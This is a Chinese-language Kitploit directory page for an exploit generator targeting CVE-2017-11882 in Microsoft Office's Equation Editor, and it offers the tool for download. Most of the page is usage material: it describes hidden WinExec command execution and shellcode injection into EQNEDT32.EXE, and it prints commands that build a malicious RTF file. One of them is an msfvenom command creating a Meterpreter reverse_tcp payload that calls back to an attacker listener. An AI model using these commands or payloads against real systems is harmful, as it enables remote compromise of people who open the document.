Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2017-11882 — CVE-2017-11882 漏洞利用最多接受超过 17k 字节的命令/代码。 | Kitploit
工具/GitHubGitHub/rip1s/cve-2017-11882
Payload生成漏洞分析漏洞利用ShellcodeWeb应用程序漏洞利用渗透测试二进制利用
GitHubrip1s/cve-2017-11882

CVE-2017-11882

CVE-2017-11882 漏洞利用最多接受超过 17k 字节的命令/代码。

查看仓库
3309248年前Kitploit 审核通过

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2017-11882 漏洞利用

CVE-2017-11882 漏洞利用最大可接受超过 17KB 字节长的命令/代码。

对于远程命令执行,此漏洞利用将调用 WinExec(参数为 SW_HIDE),并在 WinExec 返回后调用 ExitProcess。

对于远程代码执行,此漏洞利用仅跳转到代码。

我找不到对象结构的参考……所以无法通过修改文件长度来实现任意长度代码执行……:(

但我确实认为 17KB 字节完全足够了。Python 脚本会检测所需的 payload 大小,并选择合适的 payload 模板。

注意:如果未迁移到其他进程,RCE 会导致 winword 进程卡死!

目前,如果你指定 -i 参数,此漏洞利用会将你的 shellcode 注入到新的 EQNEDT32.EXE 进程中。此操作可能引起杀毒软件警觉,但不会导致 Word 进程卡死。

使用方法

root@kitploit:~
usage: CVE-2017-11882.py [-h] -c CMD [-t {0,1}] [-i INJECT] -o OUTPUT

Exploit for CVE-2017-11882 @unamer(https://github.com/unamer/CVE-2017-11882)

optional arguments:
  -h, --help            show this help message and exit
  -c CMD, --cmd CMD     Command or shellcode file to run in target system
                        (Must be shorter than 17967 bytes!!)
  -t {0,1}, --type {0,1}
                        Type (0:shellcode 1:command, default=1)
  -i INJECT, --inject INJECT
                        Inject shellcode to new process
  -o OUTPUT, --output OUTPUT
                        Output exploit rtf

示例:

对于远程命令执行:

root@kitploit:~
CVE-2017-11882.py -c cmd.exe -o test.rtf

对于远程代码执行:

  1. 生成一些 shellcode:
root@kitploit:~
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.115 LPORT=2333 -o ./sc.bin
  1. 生成漏洞利用文件:
root@kitploit:~
CVE-2017-11882.py -c sc.bin -t 0 -i 1 -o test.rtf

调试

  1. 在注册表路径 HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\EQNEDT32.EXE 中,将调试器值设置为你所使用的调试器路径。
  2. 构建一个漏洞利用文件并运行。
  3. 在 0x41165f 处设置断点。
  4. 该断点会命中两次,第二次命中时,payload 将在此函数返回后被执行。

参考

  1. https://github.com/embedi/CVE-2017-11882
  2. https://embedi.com/files/white-papers/skeleton-in-the-closet.pdf
  3. https://0patch.blogspot.co.id/2017/11/did-microsoft-just-manually-patch-their.html
下载工具